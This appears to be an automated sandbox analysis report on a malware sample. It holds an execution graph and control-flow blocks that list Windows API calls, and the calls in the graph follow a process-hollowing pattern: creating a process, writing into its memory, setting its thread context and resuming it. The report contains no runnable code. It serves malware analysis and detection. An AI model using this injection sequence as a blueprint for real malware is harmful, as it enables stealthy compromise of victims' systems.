                                                                                                            execution_graph 36027 6abbd8a 36028 6abbe00 36027->36028 36029 6abbe06 36028->36029 36033 6abd1a6 36028->36033 36054 6abd140 36028->36054 36074 6abd131 36028->36074 36034 6abd134 36033->36034 36035 6abd1a9 36033->36035 36040 6abd162 36034->36040 36094 6abd5ab 36034->36094 36099 6abd7b4 36034->36099 36104 6abde95 36034->36104 36108 6abd856 36034->36108 36113 6abdcf7 36034->36113 36118 6abd5b3 36034->36118 36124 6abd53c 36034->36124 36129 6abd63f 36034->36129 36135 6abdad9 36034->36135 36140 6abd879 36034->36140 36145 6abd945 36034->36145 36149 6abd726 36034->36149 36153 6abd7c0 36034->36153 36158 6abde81 36034->36158 36164 6abdc8d 36034->36164 36170 6abd92e 36034->36170 36175 6abd9aa 36034->36175 36035->36029 36040->36029 36055 6abd15a 36054->36055 36056 6abd5ab 2 API calls 36055->36056 36057 6abd9aa 2 API calls 36055->36057 36058 6abd92e 2 API calls 36055->36058 36059 6abdc8d 2 API calls 36055->36059 36060 6abd162 36055->36060 36061 6abde81 2 API calls 36055->36061 36062 6abd7c0 2 API calls 36055->36062 36063 6abd726 2 API calls 36055->36063 36064 6abd945 2 API calls 36055->36064 36065 6abd879 2 API calls 36055->36065 36066 6abdad9 2 API calls 36055->36066 36067 6abd63f 2 API calls 36055->36067 36068 6abd53c 2 API calls 36055->36068 36069 6abd5b3 2 API calls 36055->36069 36070 6abdcf7 2 API calls 36055->36070 36071 6abd856 2 API calls 36055->36071 36072 6abde95 2 API calls 36055->36072 36073 6abd7b4 2 API calls 36055->36073 36056->36060 36057->36060 36058->36060 36059->36060 36060->36029 36061->36060 36062->36060 36063->36060 36064->36060 36065->36060 36066->36060 36067->36060 36068->36060 36069->36060 36070->36060 36071->36060 36072->36060 36073->36060 36075 6abd134 36074->36075 36076 6abd162 36075->36076 36077 6abd5ab 2 API calls 36075->36077 36078 6abd9aa 2 API calls 36075->36078 36079 6abd92e 2 API calls 36075->36079 36080 6abdc8d 2 API calls 36075->36080 36081 6abde81 2 API calls 36075->36081 36082 6abd7c0 2 API calls 36075->36082 36083 6abd726 2 API calls 36075->36083 36084 6abd945 2 API calls 36075->36084 36085 6abd879 2 API calls 36075->36085 36086 6abdad9 2 API calls 36075->36086 36087 6abd63f 2 API calls 36075->36087 36088 6abd53c 2 API calls 36075->36088 36089 6abd5b3 2 API calls 36075->36089 36090 6abdcf7 2 API calls 36075->36090 36091 6abd856 2 API calls 36075->36091 36092 6abde95 2 API calls 36075->36092 36093 6abd7b4 2 API calls 36075->36093 36076->36029 36077->36076 36078->36076 36079->36076 36080->36076 36081->36076 36082->36076 36083->36076 36084->36076 36085->36076 36086->36076 36087->36076 36088->36076 36089->36076 36090->36076 36091->36076 36092->36076 36093->36076 36095 6abd540 36094->36095 36179 6abb930 36095->36179 36183 6abb925 36095->36183 36100 6abdcbb 36099->36100 36187 6abb5e8 36100->36187 36191 6abb5e0 36100->36191 36101 6abdcd9 36195 6abb0d8 36104->36195 36199 6abb0d0 36104->36199 36105 6abdeaf 36109 6abd85e 36108->36109 36203 6abb020 36109->36203 36207 6abb028 36109->36207 36110 6abd6c2 36114 6abdd06 36113->36114 36211 6abb6a8 36114->36211 36215 6abb6a0 36114->36215 36115 6abdb50 36115->36040 36120 6abd540 36118->36120 36119 6abd63b 36119->36040 36120->36119 36122 6abb930 CreateProcessA 36120->36122 36123 6abb925 CreateProcessA 36120->36123 36121 6abd697 36122->36121 36123->36121 36125 6abd540 36124->36125 36127 6abb930 CreateProcessA 36125->36127 36128 6abb925 CreateProcessA 36125->36128 36126 6abd697 36127->36126 36128->36126 36131 6abd540 36129->36131 36130 6abd63b 36130->36040 36131->36130 36133 6abb930 CreateProcessA 36131->36133 36134 6abb925 CreateProcessA 36131->36134 36132 6abd697 36133->36132 36134->36132 36136 6abdd01 36135->36136 36138 6abb6a8 WriteProcessMemory 36136->36138 36139 6abb6a0 WriteProcessMemory 36136->36139 36137 6abdb50 36137->36040 36138->36137 36139->36137 36141 6abd87f 36140->36141 36143 6abb028 ResumeThread 36141->36143 36144 6abb020 ResumeThread 36141->36144 36142 6abd6c2 36143->36142 36144->36142 36219 6abb798 36145->36219 36223 6abb790 36145->36223 36146 6abd967 36146->36040 36151 6abb6a8 WriteProcessMemory 36149->36151 36152 6abb6a0 WriteProcessMemory 36149->36152 36150 6abd754 36150->36040 36151->36150 36152->36150 36154 6abde2c 36153->36154 36156 6abb0d8 Wow64SetThreadContext 36154->36156 36157 6abb0d0 Wow64SetThreadContext 36154->36157 36155 6abde47 36156->36155 36157->36155 36159 6abde8e 36158->36159 36160 6abd890 36158->36160 36162 6abb028 ResumeThread 36160->36162 36163 6abb020 ResumeThread 36160->36163 36161 6abd6c2 36162->36161 36163->36161 36165 6abdd06 36164->36165 36166 6abdc90 36164->36166 36168 6abb6a8 WriteProcessMemory 36165->36168 36169 6abb6a0 WriteProcessMemory 36165->36169 36166->36040 36167 6abdb50 36167->36040 36168->36167 36169->36167 36171 6abd85e 36170->36171 36173 6abb028 ResumeThread 36171->36173 36174 6abb020 ResumeThread 36171->36174 36172 6abd6c2 36173->36172 36174->36172 36177 6abb6a8 WriteProcessMemory 36175->36177 36178 6abb6a0 WriteProcessMemory 36175->36178 36176 6abd9ce 36177->36176 36178->36176 36180 6abb9b9 36179->36180 36180->36180 36181 6abbb1e CreateProcessA 36180->36181 36182 6abbb7b 36181->36182 36184 6abb930 CreateProcessA 36183->36184 36186 6abbb7b 36184->36186 36186->36186 36188 6abb628 VirtualAllocEx 36187->36188 36190 6abb665 36188->36190 36190->36101 36192 6abb5e8 VirtualAllocEx 36191->36192 36194 6abb665 36192->36194 36194->36101 36196 6abb11d Wow64SetThreadContext 36195->36196 36198 6abb165 36196->36198 36198->36105 36200 6abb0d8 Wow64SetThreadContext 36199->36200 36202 6abb165 36200->36202 36202->36105 36204 6abb068 ResumeThread 36203->36204 36206 6abb099 36204->36206 36206->36110 36208 6abb068 ResumeThread 36207->36208 36210 6abb099 36208->36210 36210->36110 36212 6abb6f0 WriteProcessMemory 36211->36212 36214 6abb747 36212->36214 36214->36115 36216 6abb6f0 WriteProcessMemory 36215->36216 36218 6abb747 36216->36218 36218->36115 36220 6abb7e3 ReadProcessMemory 36219->36220 36222 6abb827 36220->36222 36222->36146 36224 6abb798 ReadProcessMemory 36223->36224 36226 6abb827 36224->36226 36226->36146 35919 6abe2e8 35920 6abe473 35919->35920 35922 6abe30e 35919->35922 35922->35920 35923 6ab9ec4 35922->35923 35924 6abe568 PostMessageW 35923->35924 35925 6abe5d4 35924->35925 35925->35922 35926 b7acf0 35930 b7ade8 35926->35930 35935 b7add8 35926->35935 35927 b7acff 35931 b7ae1c 35930->35931 35932 b7adf9 35930->35932 35931->35927 35932->35931 35933 b7b020 GetModuleHandleW 35932->35933 35934 b7b04d 35933->35934 35934->35927 35936 b7adf9 35935->35936 35937 b7ae1c 35935->35937 35936->35937 35938 b7b020 GetModuleHandleW 35936->35938 35937->35927 35939 b7b04d 35938->35939 35939->35927 36227 4bf6698 36228 4bf66c2 36227->36228 36235 4bf6584 36228->36235 36231 4bf6584 2 API calls 36232 4bf6730 36231->36232 36233 4bf6584 2 API calls 36232->36233 36234 4bf675f 36233->36234 36236 4bf658f 36235->36236 36239 4bf6634 36236->36239 36238 4bf6701 36238->36231 36240 4bf663f 36239->36240 36243 b75cfc 2 API calls 36240->36243 36244 b78350 36240->36244 36241 4bf72dc 36241->36238 36243->36241 36246 b78355 36244->36246 36245 b78649 36245->36241 36246->36245 36247 b7cda0 2 API calls 36246->36247 36247->36245 36303 b7d6c0 DuplicateHandle 36304 b7d756 36303->36304 36248 b2d01c 36249 b2d034 36248->36249 36250 b2d08e 36249->36250 36255 4bf2809 36249->36255 36260 4bf1a97 36249->36260 36265 4bf2818 36249->36265 36270 4bf1aa8 36249->36270 36256 4bf2845 36255->36256 36257 4bf2877 36256->36257 36275 4bf2da8 36256->36275 36280 4bf2d88 36256->36280 36261 4bf1a87 36260->36261 36261->36260 36263 4bf2809 2 API calls 36261->36263 36264 4bf2818 2 API calls 36261->36264 36262 4bf1aef 36262->36250 36263->36262 36264->36262 36266 4bf2845 36265->36266 36267 4bf2877 36266->36267 36268 4bf2da8 2 API calls 36266->36268 36269 4bf2d88 2 API calls 36266->36269 36268->36267 36269->36267 36271 4bf1ace 36270->36271 36273 4bf2809 2 API calls 36271->36273 36274 4bf2818 2 API calls 36271->36274 36272 4bf1aef 36272->36250 36273->36272 36274->36272 36277 4bf2dbc 36275->36277 36276 4bf2e48 36276->36257 36285 4bf2e60 36277->36285 36288 4bf2e50 36277->36288 36282 4bf2dbc 36280->36282 36281 4bf2e48 36281->36257 36283 4bf2e60 2 API calls 36282->36283 36284 4bf2e50 2 API calls 36282->36284 36283->36281 36284->36281 36287 4bf2e71 36285->36287 36291 4bf4022 36285->36291 36287->36276 36289 4bf2e71 36288->36289 36290 4bf4022 2 API calls 36288->36290 36289->36276 36290->36289 36295 4bf4050 36291->36295 36299 4bf4040 36291->36299 36292 4bf403a 36292->36287 36296 4bf4092 36295->36296 36298 4bf4099 36295->36298 36297 4bf40ea CallWindowProcW 36296->36297 36296->36298 36297->36298 36298->36292 36300 4bf4092 36299->36300 36302 4bf4099 36299->36302 36301 4bf40ea CallWindowProcW 36300->36301 36300->36302 36301->36302 36302->36292 35940 b7d478 35941 b7d4be GetCurrentProcess 35940->35941 35943 b7d510 GetCurrentThread 35941->35943 35944 b7d509 35941->35944 35945 b7d546 35943->35945 35946 b7d54d GetCurrentProcess 35943->35946 35944->35943 35945->35946 35949 b7d583 35946->35949 35947 b7d5ab GetCurrentThreadId 35948 b7d5dc 35947->35948 35949->35947 35950 b74668 35951 b7467a 35950->35951 35952 b74686 35951->35952 35956 b74778 35951->35956 35961 b73e34 35952->35961 35954 b746a5 35957 b7479d 35956->35957 35965 b74888 35957->35965 35969 b74878 35957->35969 35962 b73e3f 35961->35962 35977 b75c7c 35962->35977 35964 b76ff1 35964->35954 35967 b748af 35965->35967 35966 b7498c 35966->35966 35967->35966 35973 b744b4 35967->35973 35970 b748af 35969->35970 35971 b7498c 35970->35971 35972 b744b4 CreateActCtxA 35970->35972 35972->35971 35974 b75918 CreateActCtxA 35973->35974 35976 b759db 35974->35976 35978 b75c87 35977->35978 35981 b75c9c 35978->35981 35980 b7712d 35980->35964 35982 b75ca7 35981->35982 35985 b75ccc 35982->35985 35984 b77202 35984->35980 35986 b75cd7 35985->35986 35989 b75cfc 35986->35989 35988 b77305 35988->35984 35990 b75d07 35989->35990 35991 b78649 35990->35991 35993 b7cda0 35990->35993 35991->35988 35995 b7cdd1 35993->35995 35994 b7cdf5 35994->35991 35995->35994 35998 b7cf60 35995->35998 36002 b7cf1d 35995->36002 35999 b7cf6d 35998->35999 36001 b7cfa7 35999->36001 36006 b7b7c0 35999->36006 36001->35994 36003 b7cf90 36002->36003 36004 b7cfa7 36003->36004 36005 b7b7c0 2 API calls 36003->36005 36004->35994 36005->36004 36007 b7b7cb 36006->36007 36009 b7dcb8 36007->36009 36010 b7d0c4 36007->36010 36009->36009 36011 b7d0cf 36010->36011 36012 b75cfc 2 API calls 36011->36012 36013 b7dd27 36012->36013 36017 b7fa90 36013->36017 36022 b7faa8 36013->36022 36014 b7dd61 36014->36009 36018 b7fad9 36017->36018 36019 b7fae5 36017->36019 36018->36019 36020 4bf09af CreateWindowExW CreateWindowExW 36018->36020 36021 4bf09c0 CreateWindowExW CreateWindowExW 36018->36021 36019->36014 36020->36019 36021->36019 36023 b7fae5 36022->36023 36024 b7fad9 36022->36024 36023->36014 36024->36023 36025 4bf09af CreateWindowExW CreateWindowExW 36024->36025 36026 4bf09c0 CreateWindowExW CreateWindowExW 36024->36026 36025->36023 36026->36023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1d8a9d17ba50fef0941e8deadc56a7dd78af017144b26a920d258c555b1dc591
                                                                                                            • Instruction ID: f5d738f1b8a5e86e599b31d2a8132555927507e6ddd7f70fac5c0db3450153ed
                                                                                                            • Opcode Fuzzy Hash: 1d8a9d17ba50fef0941e8deadc56a7dd78af017144b26a920d258c555b1dc591
                                                                                                            • Instruction Fuzzy Hash: 0932A634E11219CFDB14DFA4C894A9DB7B2FF8A304F1185AAD909AB365DB30AD85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2cb77e249c1482e9609f643c01aed8e98dcd1490d3ae838b0f1a2381e87da728
                                                                                                            • Instruction ID: c97b17d40867dad30645b53358214160355b25f1b65cbdaaff67cdc106b0ae08
                                                                                                            • Opcode Fuzzy Hash: 2cb77e249c1482e9609f643c01aed8e98dcd1490d3ae838b0f1a2381e87da728
                                                                                                            • Instruction Fuzzy Hash: C032B534E50219CFDB14DFA4C894A9DB7B2FF8A304F1185AAD909AB365DB30AD85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1c9ef92985234ae14521dbe4665897c998c53ba068ed1c3a5e2a78f64b47877b
                                                                                                            • Instruction ID: 64e05393c0753d974fc253a9c1458a43059025c19f84f94703077e315957e270
                                                                                                            • Opcode Fuzzy Hash: 1c9ef92985234ae14521dbe4665897c998c53ba068ed1c3a5e2a78f64b47877b
                                                                                                            • Instruction Fuzzy Hash: EAA00230CDE21588A2C13C1005618F5D4BD175B090F817002442F330135840D00008DD

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 294 b7d468-b7d507 GetCurrentProcess 298 b7d510-b7d544 GetCurrentThread 294->298 299 b7d509-b7d50f 294->299 300 b7d546-b7d54c 298->300 301 b7d54d-b7d581 GetCurrentProcess 298->301 299->298 300->301 303 b7d583-b7d589 301->303 304 b7d58a-b7d5a5 call b7d647 301->304 303->304 307 b7d5ab-b7d5da GetCurrentThreadId 304->307 308 b7d5e3-b7d645 307->308 309 b7d5dc-b7d5e2 307->309 309->308
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00B7D4F6
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00B7D533
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00B7D570
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00B7D5C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 238d431d0436177f3e6212c9ef30b6831d318db77eca89212c9682a282ec1b91
                                                                                                            • Instruction ID: 513200c16a2e969f5fc74e9e7ff0da940cfa8c0f0254f94dfc599785bc1a8d0c
                                                                                                            • Opcode Fuzzy Hash: 238d431d0436177f3e6212c9ef30b6831d318db77eca89212c9682a282ec1b91
                                                                                                            • Instruction Fuzzy Hash: 3C5144B0D012498FDB14CFAAD548BDEBBF1AF88318F24C499D419A73A0D735A984CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 316 b7d478-b7d507 GetCurrentProcess 320 b7d510-b7d544 GetCurrentThread 316->320 321 b7d509-b7d50f 316->321 322 b7d546-b7d54c 320->322 323 b7d54d-b7d581 GetCurrentProcess 320->323 321->320 322->323 325 b7d583-b7d589 323->325 326 b7d58a-b7d5a5 call b7d647 323->326 325->326 329 b7d5ab-b7d5da GetCurrentThreadId 326->329 330 b7d5e3-b7d645 329->330 331 b7d5dc-b7d5e2 329->331 331->330
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00B7D4F6
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00B7D533
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00B7D570
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00B7D5C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 5bf3ac7a99321039399535c417cebc569e55d3f5f06a966b90fbb539374463a7
                                                                                                            • Instruction ID: 7fe0423d72f3cf354b4270a8784baa9b9612e6b690b6b9b4f067906c84bb4638
                                                                                                            • Opcode Fuzzy Hash: 5bf3ac7a99321039399535c417cebc569e55d3f5f06a966b90fbb539374463a7
                                                                                                            • Instruction Fuzzy Hash: 035144B0D012098FDB04DFAAD548B9EBBF1EF48314F24C499E019A7360D774A984CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 445 6abb925-6abb9c5 448 6abb9fe-6abba1e 445->448 449 6abb9c7-6abb9d1 445->449 454 6abba20-6abba2a 448->454 455 6abba57-6abba86 448->455 449->448 450 6abb9d3-6abb9d5 449->450 452 6abb9f8-6abb9fb 450->452 453 6abb9d7-6abb9e1 450->453 452->448 456 6abb9e3 453->456 457 6abb9e5-6abb9f4 453->457 454->455 458 6abba2c-6abba2e 454->458 465 6abba88-6abba92 455->465 466 6abbabf-6abbb79 CreateProcessA 455->466 456->457 457->457 459 6abb9f6 457->459 460 6abba51-6abba54 458->460 461 6abba30-6abba3a 458->461 459->452 460->455 463 6abba3e-6abba4d 461->463 464 6abba3c 461->464 463->463 467 6abba4f 463->467 464->463 465->466 468 6abba94-6abba96 465->468 477 6abbb7b-6abbb81 466->477 478 6abbb82-6abbc08 466->478 467->460 470 6abbab9-6abbabc 468->470 471 6abba98-6abbaa2 468->471 470->466 472 6abbaa6-6abbab5 471->472 473 6abbaa4 471->473 472->472 474 6abbab7 472->474 473->472 474->470 477->478 488 6abbc0a-6abbc0e 478->488 489 6abbc18-6abbc1c 478->489 488->489 490 6abbc10 488->490 491 6abbc1e-6abbc22 489->491 492 6abbc2c-6abbc30 489->492 490->489 491->492 493 6abbc24 491->493 494 6abbc32-6abbc36 492->494 495 6abbc40-6abbc44 492->495 493->492 494->495 496 6abbc38 494->496 497 6abbc56-6abbc5d 495->497 498 6abbc46-6abbc4c 495->498 496->495 499 6abbc5f-6abbc6e 497->499 500 6abbc74 497->500 498->497 499->500 502 6abbc75 500->502 502->502
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ABBB66
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 7710f5b18dcaef788ac775de2233d955b5e5d6ffeb70d63884d1b08f148179a8
                                                                                                            • Instruction ID: 29f1c96fb1d52146cb04d6b49b0072656046adbdc96a5b8943a8ff8504376503
                                                                                                            • Opcode Fuzzy Hash: 7710f5b18dcaef788ac775de2233d955b5e5d6ffeb70d63884d1b08f148179a8
                                                                                                            • Instruction Fuzzy Hash: B5A19A70D00219DFDB64DF69CC41BEEBBB6BF48310F0485A9E818A7251DB749985CFA2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 503 6abb930-6abb9c5 505 6abb9fe-6abba1e 503->505 506 6abb9c7-6abb9d1 503->506 511 6abba20-6abba2a 505->511 512 6abba57-6abba86 505->512 506->505 507 6abb9d3-6abb9d5 506->507 509 6abb9f8-6abb9fb 507->509 510 6abb9d7-6abb9e1 507->510 509->505 513 6abb9e3 510->513 514 6abb9e5-6abb9f4 510->514 511->512 515 6abba2c-6abba2e 511->515 522 6abba88-6abba92 512->522 523 6abbabf-6abbb79 CreateProcessA 512->523 513->514 514->514 516 6abb9f6 514->516 517 6abba51-6abba54 515->517 518 6abba30-6abba3a 515->518 516->509 517->512 520 6abba3e-6abba4d 518->520 521 6abba3c 518->521 520->520 524 6abba4f 520->524 521->520 522->523 525 6abba94-6abba96 522->525 534 6abbb7b-6abbb81 523->534 535 6abbb82-6abbc08 523->535 524->517 527 6abbab9-6abbabc 525->527 528 6abba98-6abbaa2 525->528 527->523 529 6abbaa6-6abbab5 528->529 530 6abbaa4 528->530 529->529 531 6abbab7 529->531 530->529 531->527 534->535 545 6abbc0a-6abbc0e 535->545 546 6abbc18-6abbc1c 535->546 545->546 547 6abbc10 545->547 548 6abbc1e-6abbc22 546->548 549 6abbc2c-6abbc30 546->549 547->546 548->549 550 6abbc24 548->550 551 6abbc32-6abbc36 549->551 552 6abbc40-6abbc44 549->552 550->549 551->552 553 6abbc38 551->553 554 6abbc56-6abbc5d 552->554 555 6abbc46-6abbc4c 552->555 553->552 556 6abbc5f-6abbc6e 554->556 557 6abbc74 554->557 555->554 556->557 559 6abbc75 557->559 559->559
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ABBB66
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 2405179ed88ae1ab0f1eda6e16208ea97d0654cd26e1ec5db331196a3b57d4ea
                                                                                                            • Instruction ID: db622c9b1ac53dd50a8da0a007981f857bed886ead9e0619bbefbdee00d1f976
                                                                                                            • Opcode Fuzzy Hash: 2405179ed88ae1ab0f1eda6e16208ea97d0654cd26e1ec5db331196a3b57d4ea
                                                                                                            • Instruction Fuzzy Hash: 9F919B71D00219DFDB60DF69CC41BEEBBB6BF48310F0485A9E808A7251DB749985CFA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 560 b7ade8-b7adf7 561 b7ae23-b7ae27 560->561 562 b7adf9-b7ae06 call b79414 560->562 563 b7ae3b-b7ae7c 561->563 564 b7ae29-b7ae33 561->564 569 b7ae1c 562->569 570 b7ae08 562->570 571 b7ae7e-b7ae86 563->571 572 b7ae89-b7ae97 563->572 564->563 569->561 615 b7ae0e call b7b080 570->615 616 b7ae0e call b7b070 570->616 571->572 574 b7aebb-b7aebd 572->574 575 b7ae99-b7ae9e 572->575 573 b7ae14-b7ae16 573->569 576 b7af58-b7b018 573->576 577 b7aec0-b7aec7 574->577 578 b7aea0-b7aea7 call b7a150 575->578 579 b7aea9 575->579 610 b7b020-b7b04b GetModuleHandleW 576->610 611 b7b01a-b7b01d 576->611 581 b7aed4-b7aedb 577->581 582 b7aec9-b7aed1 577->582 580 b7aeab-b7aeb9 578->580 579->580 580->577 585 b7aedd-b7aee5 581->585 586 b7aee8-b7aef1 call b7a160 581->586 582->581 585->586 591 b7aef3-b7aefb 586->591 592 b7aefe-b7af03 586->592 591->592 593 b7af05-b7af0c 592->593 594 b7af21-b7af2e 592->594 593->594 596 b7af0e-b7af1e call b7a170 call b7a180 593->596 601 b7af51-b7af57 594->601 602 b7af30-b7af4e 594->602 596->594 602->601 612 b7b054-b7b068 610->612 613 b7b04d-b7b053 610->613 611->610 613->612 615->573 616->573
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00B7B03E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 3490107495c86b47eed6302187b38360725f721bc045d64f776b269b5b5c2313
                                                                                                            • Instruction ID: 91ca6c1c98a9f1facdcef9d0fc9afe215dab4bb403fb2c0b2667f73dac09c23a
                                                                                                            • Opcode Fuzzy Hash: 3490107495c86b47eed6302187b38360725f721bc045d64f776b269b5b5c2313
                                                                                                            • Instruction Fuzzy Hash: 61715470A00B058FD764DF29D05179ABBF1FF88300F10896DE0AADBA50DB34E949CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 725 4bf18e4-4bf1956 726 4bf1958-4bf195e 725->726 727 4bf1961-4bf1968 725->727 726->727 728 4bf196a-4bf1970 727->728 729 4bf1973-4bf1a12 CreateWindowExW 727->729 728->729 731 4bf1a1b-4bf1a53 729->731 732 4bf1a14-4bf1a1a 729->732 736 4bf1a55-4bf1a58 731->736 737 4bf1a60 731->737 732->731 736->737 738 4bf1a61 737->738 738->738
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BF1A02
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 8342567e0bedf2be95c3704c92fd06a4b2800811ca1f1807e5072b832b1c230b
                                                                                                            • Instruction ID: abbb4b9593dea760b016a131727b44ed1f52e40b98b92d5b426f0610173d0e6e
                                                                                                            • Opcode Fuzzy Hash: 8342567e0bedf2be95c3704c92fd06a4b2800811ca1f1807e5072b832b1c230b
                                                                                                            • Instruction Fuzzy Hash: 8151E2B5C00349DFDB14CFA9C884ADDBBB1FF48310F24856AE418AB210D774A846CF91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 739 4bf18f0-4bf1956 740 4bf1958-4bf195e 739->740 741 4bf1961-4bf1968 739->741 740->741 742 4bf196a-4bf1970 741->742 743 4bf1973-4bf1a12 CreateWindowExW 741->743 742->743 745 4bf1a1b-4bf1a53 743->745 746 4bf1a14-4bf1a1a 743->746 750 4bf1a55-4bf1a58 745->750 751 4bf1a60 745->751 746->745 750->751 752 4bf1a61 751->752 752->752
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BF1A02
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: b572e536b4c2e40801baeac185e19b96584de2fae7307499878df4ca574649e8
                                                                                                            • Instruction ID: 0bcd77a4789d98ebf86b21ed01ea49fef6296fc525f6794bf7b9d6ca7af304c5
                                                                                                            • Opcode Fuzzy Hash: b572e536b4c2e40801baeac185e19b96584de2fae7307499878df4ca574649e8
                                                                                                            • Instruction Fuzzy Hash: 5741D2B5D00309DFDB14CF99C884ADEBBB5FF48314F24866AE418AB210D775A945CF91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 753 b744b4-b759d9 CreateActCtxA 756 b759e2-b75a3c 753->756 757 b759db-b759e1 753->757 764 b75a3e-b75a41 756->764 765 b75a4b-b75a4f 756->765 757->756 764->765 766 b75a51-b75a5d 765->766 767 b75a60 765->767 766->767 769 b75a61 767->769 769->769
